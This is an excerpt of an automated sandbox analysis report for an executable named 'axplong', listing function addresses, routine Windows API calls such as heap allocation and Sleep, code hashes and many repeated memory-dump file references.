Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 3a3b3bbd6ae8322d595c5ea932739113c9cfadc172dd485c228046899fdda60c
Instruction ID: f70c60e550e052f4ce2299f72754deb52a0a8e09464a08348dfc9884bda30c8d
Opcode Fuzzy Hash: 3a3b3bbd6ae8322d595c5ea932739113c9cfadc172dd485c228046899fdda60c
Instruction Fuzzy Hash: 08110DB291020DABDB10DED5D844EDFB7BCAB08315F504266E916E7180E730EB588B65

Function 0025D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0025A5ED,?,002574AE,?,00000000,?), ref: 0025D731

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d729071ab79579edc94c09d3362bf7b77ed09b154b4d3b6bc589629057dc6506
Instruction ID: e520113d6ab98cbb3e5a3c516c00a4f4ccc4f3005982e951c56cf48b1c950277
Opcode Fuzzy Hash: d729071ab79579edc94c09d3362bf7b77ed09b154b4d3b6bc589629057dc6506
Instruction Fuzzy Hash: 99F0E931A75126679B312E215D05B5BB799DF897B3B184112AC04EA181CB70E82847E9

Function 00236AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00236B65

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ccd07ec709620d58c1ad5f322de85688f9578b1b1323ffcd435c7a24df265165
Instruction ID: ea4f7bfd2546aded904f564a55c9a3b226a095d02212a2e4975717969a014545
Opcode Fuzzy Hash: ccd07ec709620d58c1ad5f322de85688f9578b1b1323ffcd435c7a24df265165
Instruction Fuzzy Hash: 95F0F9B5E20514FBC710BBA8AC0B71D7B75A707B64F800348E811672D1DB705A244FD2

Function 04CE01DF Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ecea18d853541a6a53097e9be1c682d108c7ed69bb23a1505bb5626cfb41f1a
Instruction ID: 45649011c746fcce74d71971b03eab13ccc468c2af1d8da2e195c1936c385fe0
Opcode Fuzzy Hash: 3ecea18d853541a6a53097e9be1c682d108c7ed69bb23a1505bb5626cfb41f1a
Instruction Fuzzy Hash: 51113AF754C2E0AEE60341A76E25AF66FEED9D3630339455BF482C6043D7D2160AA172

Function 04CE0256 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170d40327b37e77e679b4a328501f6c400fe4cc5bd0d9c8f1093bfefb04e88c8
Instruction ID: e471294fa6577e3f6084c88fbc0f76feaf49f1e1c11d2280dc5c95e75f1664e4
Opcode Fuzzy Hash: 170d40327b37e77e679b4a328501f6c400fe4cc5bd0d9c8f1093bfefb04e88c8
Instruction Fuzzy Hash: 5BF0E9B710D121FDAA0699537B10EFA7BBFDAC0730334841BF442C4412D3A5568AB6B1

Function 04CE0216 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3973a827f1512107c4e0646f59e84f6ff9615ac6ab9b2e66e92a4e6b5ebfb39f
Instruction ID: 6cbf06154fbb119f880759e1ec0d2f1143be62b8c817891b3a335c66774c4178
Opcode Fuzzy Hash: 3973a827f1512107c4e0646f59e84f6ff9615ac6ab9b2e66e92a4e6b5ebfb39f
Instruction Fuzzy Hash: 6CF0A0F750D160BEB50295537E58AFA3BEED9C5631334485EF442C5003CB961A8A9672

Function 04CE01D8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b086ec833a1adf586a49e1ed582fa3feb0b0ccb0d0fa925cef1722da2c13c8
Instruction ID: 156fd6f028f580d3e3e21c35f3d5b3c49496322605e07faa5a0e43c77aed456a
Opcode Fuzzy Hash: f2b086ec833a1adf586a49e1ed582fa3feb0b0ccb0d0fa925cef1722da2c13c8
Instruction Fuzzy Hash: 9BF0A7BB108124FDB5025943BE10EFA7BAFE6C07307348416F443C1502D3E65A867671

Non-executed Functions

Function 00263068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002631E3

Strings

1#IND, xrefs: 00264373
1#QNAN, xrefs: 00264381
1#INF, xrefs: 0026439E
1#SNAN, xrefs: 0026437A

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0bdec2a405837c368a4356779c45418c82035a00ecfdaf044a177c501b20c7e5
Instruction ID: 018552de8d5d3453534833abe0d10d052240fc450bda141e4d6dd77ba7755765
Opcode Fuzzy Hash: 0bdec2a405837c368a4356779c45418c82035a00ecfdaf044a177c501b20c7e5
Instruction Fuzzy Hash: 08C26C71E282298FDB25CE28DD447E9B3B9EB48305F1441EAD84EE7240E774AED58F40

Function 00262BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 3c8988acc54ae269c988d549323e8392c030faf7eee39a33027cffa446efd30a
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 35F15071E1061ADFDF14CFA8C9806ADB7B1FF48314F258269E815AB384D731AE55CB90

Function 0023D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0022247E

Strings

'k#d+(, xrefs: 0023DCEC
'k#d+(, xrefs: 0023D324, 0023DCA4

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k#d+($'k#d+(
API String ID: 2659868963-81376138
Opcode ID: d983a9ed468281cf7cf65a9eb3bdab303b5b766ee684285062c9c4f91e1d4027
Instruction ID: d6e20020db0216374d83594d12ae66517ea92959987d410726f24cee9b23c2b4
Opcode Fuzzy Hash: d983a9ed468281cf7cf65a9eb3bdab303b5b766ee684285062c9c4f91e1d4027
Instruction Fuzzy Hash: FC519CB2A2160ACFDB19CF64E8857AABBF0FB18310F24856AD804EB254D7749954CF90

Function 0023CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0023CE82,?,?,?,?,0023CEB7,?,?,?,?,?,?,0023C42D,?,00000001), ref: 0023CB33

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 30f4453913bc9fe218caaf0e92e0740a095ec99c2f6c2c0e200928a3cd7eb2b7
Instruction ID: d6c8a5ed3b440b4b7a8a8f2f9e3184a31892a08b9c45430cd0d6db96a369f49a
Opcode Fuzzy Hash: 30f4453913bc9fe218caaf0e92e0740a095ec99c2f6c2c0e200928a3cd7eb2b7
Instruction Fuzzy Hash: 5BD02233523038A7CA012B91BC0C8ADFB4E9B00B587180111ED08331208A91BC605BD0

Function 00257D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00257EFF

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: dd77365cdd002d60a69e542875ef33d440194fd27c2dea7cb474a860b76c2d60
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: F45198702FC74A56CB388E28B8977BE67AA9F02303F140459DC42D7681DBB19D2D871D

Function 00224CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16088b5996927a9943f3d6bd2b0aaa8c0e08b9c80596280850544cc6a6e4ad8
Instruction ID: a545225ddcf6d147409e193fd3b317c9dd3f72286d4044b87a3cd9aecfaff499
Opcode Fuzzy Hash: c16088b5996927a9943f3d6bd2b0aaa8c0e08b9c80596280850544cc6a6e4ad8
Instruction Fuzzy Hash: 4D225FB7F515144BDB0CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44

Function 00266F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e64a151d022aad8f8680a833e34ca38a667ca38a24e130c0eaa5b7e02219eb5
Instruction ID: 8fed22e08e0dddfee103df0a04ade97ac654749b5073aeed6ed2d6f261437a2e
Opcode Fuzzy Hash: 8e64a151d022aad8f8680a833e34ca38a667ca38a24e130c0eaa5b7e02219eb5
Instruction Fuzzy Hash: EDB16D31224609DFD715CF2CD486B657BE0FF45368F258699E89ACF2A1C335E9A2CB40

Function 00224AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f1e7fa35f632830b7a74c3af50c28ef6a69821c09a58f8607d26dc3e91b69f
Instruction ID: ac1d8aec266a00125f99ede4e8b2b812a427ef9022e992bb9ca2e14f6b394be2
Opcode Fuzzy Hash: 35f1e7fa35f632830b7a74c3af50c28ef6a69821c09a58f8607d26dc3e91b69f
Instruction Fuzzy Hash: 3051E17061C3918FD319CF2C911563AFFE1AFD5200F484A9EE4DA87282D774DA48CBA2

Function 0026777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9106406a63f8219e8703adfe38cd4c014a438e08db5a8ea0767afa889646fde
Instruction ID: 76e72a91afc4b566910f024cfc61fc51ce8263b1f5c61beb59fb3e1cdb27d864
Opcode Fuzzy Hash: d9106406a63f8219e8703adfe38cd4c014a438e08db5a8ea0767afa889646fde
